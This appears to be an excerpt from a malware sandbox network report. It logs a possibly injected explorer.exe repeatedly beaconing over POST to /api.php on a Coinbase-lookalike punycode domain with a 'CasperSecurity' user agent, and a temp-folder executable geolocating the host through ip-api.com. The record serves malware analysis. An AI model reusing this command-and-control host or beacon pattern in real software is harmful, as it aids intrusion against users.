Jul 6, 2024 13:28:11.296493053 CEST	641	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:11 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 465 Access-Control-Allow-Origin: * X-Ttl: 59 X-Rl: 43 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49833	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:11.609117985 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:11.615459919 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:13.397460938 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OVa6AKG2FI0pg3lXA%2FZGhMkPTcD1Urkdny9y9UjGRtlpFxIU8foC15vRf6i39CQ527kHpbsPbCZcvZ%2BMg0zYUF9A3zu3z%2B2HzawCgU6mJgOaKeCGGs8K%2Fyacrv1ziYc%2F94GGQuTN9q2O4eM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3ffb1bef42d1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jul 6, 2024 13:28:13.398216963 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OVa6AKG2FI0pg3lXA%2FZGhMkPTcD1Urkdny9y9UjGRtlpFxIU8foC15vRf6i39CQ527kHpbsPbCZcvZ%2BMg0zYUF9A3zu3z%2B2HzawCgU6mJgOaKeCGGs8K%2Fyacrv1ziYc%2F94GGQuTN9q2O4eM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3ffb1bef42d1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jul 6, 2024 13:28:13.398879051 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OVa6AKG2FI0pg3lXA%2FZGhMkPTcD1Urkdny9y9UjGRtlpFxIU8foC15vRf6i39CQ527kHpbsPbCZcvZ%2BMg0zYUF9A3zu3z%2B2HzawCgU6mJgOaKeCGGs8K%2Fyacrv1ziYc%2F94GGQuTN9q2O4eM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef3ffb1bef42d1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49834	208.95.112.1	80	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:12.170983076 CEST	63	OUT	GET /xml HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jul 6, 2024 13:28:13.398053885 CEST	641	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:12 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 465 Access-Control-Allow-Origin: * X-Ttl: 57 X-Rl: 42 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>
Jul 6, 2024 13:28:13.398552895 CEST	641	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:12 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 465 Access-Control-Allow-Origin: * X-Ttl: 57 X-Rl: 42 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>
Jul 6, 2024 13:28:13.398642063 CEST	641	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:12 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 465 Access-Control-Allow-Origin: * X-Ttl: 57 X-Rl: 42 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49835	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:13.509566069 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:13.515986919 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:14.207711935 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3rSaR2qt7NuRN6sdQW%2Bd9d1Rda8IEaYdAAwXLcGDeFHGdYh2h3Ew%2BIpBKBXw1CK52veKn731r7RuepWQz0GIXrHhpfY1EkvyEDlQQEp2SEK%2BEiVHfeb%2FD4yGhXlwHuuHLXMqloVrxvV0K9M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef4006ec69435d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49836	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:14.320671082 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:14.325546026 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:15.050468922 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gLc%2FneY9fyCK1hSFk0kcNbyhecpxBct7wtYCfMm26SQUaBIVMtr3Nm3%2FywQianLD11t93NabGMjcmIFB8NzaQRwZb69K1rFKadaKmHUbL2I5EcPr52%2FQpHNvsVT61d0T0QES7Sz7%2FWkQ%2Fe4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef400c19fe180d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49837	208.95.112.1	80	7244	C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:14.524842024 CEST	39	OUT	GET /xml HTTP/1.1 Host: ip-api.com
Jul 6, 2024 13:28:14.996701956 CEST	641	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:14 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 465 Access-Control-Allow-Origin: * X-Ttl: 55 X-Rl: 41 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49839	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:15.166063070 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:15.173758984 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:15.980057001 CEST	615	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ojS3rNO55m%2Fhf8C5AXymrnokRZh9eUeWIOrJGC63rhDc0KGFoJ9vCtho4wZ2WIBRmgPlXJaqXmI%2FllxZUsxQn8mAN6iKyENMrZprqisGFwmygQxXos07C3S5qf8bZgRN2yFydpmMjo0M1KM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40116aae7cf0-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49840	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:16.102128029 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:16.106971979 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:16.821794033 CEST	629	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3q02po0N75xyzjZt6NdX3RKMXyA9%2BFomNq9CMr1o0HopGatxHROmwh2X%2BvtMSoZfB8ESXRcfvFYn3zBfRoRxRAtQ%2Bdb%2F%2F%2FqCAvPphsp%2BN%2BNSo4bwwcAOf26GqxhcMphVmru%2Bx3MFWfofs6w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40173ad743eb-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49842	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:17.072931051 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:17.080514908 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:17.817667007 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d5qeatmvx3v%2BTS%2FOdtUElCElSAUP2CAViHCRoR%2FdEQhrLlTQFEhwDbsjn9GCmtI8kwlvWe6lXDSZfmgi7A4ogUVyRzNWY3%2ByVJuUnim1mxCY%2FbdTDPP0emQZ7EltIasS4LWJiCiiaESRvl0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef401d58617271-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49843	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:17.944094896 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:17.949173927 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:18.768424988 CEST	623	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8QRz8309uvEX%2B7KGR4kl38SS83fZj8tLqSObwvQgUD7Yz%2B8E5BMZz%2BYc49vxYOvwnCC1rXMTheVUC4LmNL%2Flg1d4EIo9RrUgzH1GVRcIHX%2BtU99ys02MYhA2%2B1pnnuwzWoykK6qzBDsChhM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef4022cb914213-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49845	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:18.885767937 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:18.890686035 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:19.600984097 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wutuPuuSOvGXmgmctOfu3MxAEzHUp4HMnQ6l6ZESWqzj7zf1g5bD%2BbwJPOxEWN6bNn%2Fip4PQRrNlQ8G5qFm7Og5EAXr%2B9XX3xpZl5GbQVq6rfyO4FbrtjeR%2FjjLvHbjVrEkbtghM9a0Kyg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef40288f6c42db-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49846	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:19.823570013 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:19.828388929 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:20.561506987 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xSo57SJoUBA9i%2FWJKoAwIHYYEWI65%2BYajWiN0RQX9Kr4R75%2F%2FtXBf8GwbaYZzYoxq1doGtchXX51S87xacIxWQwaT0ypyRrhYolWpovbN%2BsUjhSFpTfGY8UubB8glFXt922qmKDsZgHglXg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef402e6ac0c41d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49847	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:20.702090025 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:20.706885099 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:28:21.406790018 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:28:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qg9967PBSrutY9d3T6aa8l9FeqVLmLyueFzAWxIZ%2FHyRDNsetFbtTXumKC9cF6skKwMio%2FxZS9BxS%2Fs0vrDGEmYkfqKq1gjZmEWmGwPbGGIMzp%2FYmafHvrXW4ADfQACiVoCMRK92WEAdAdw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef4033eb8842a7-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49848	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:28:21.524236917 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:28:21.529037952 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
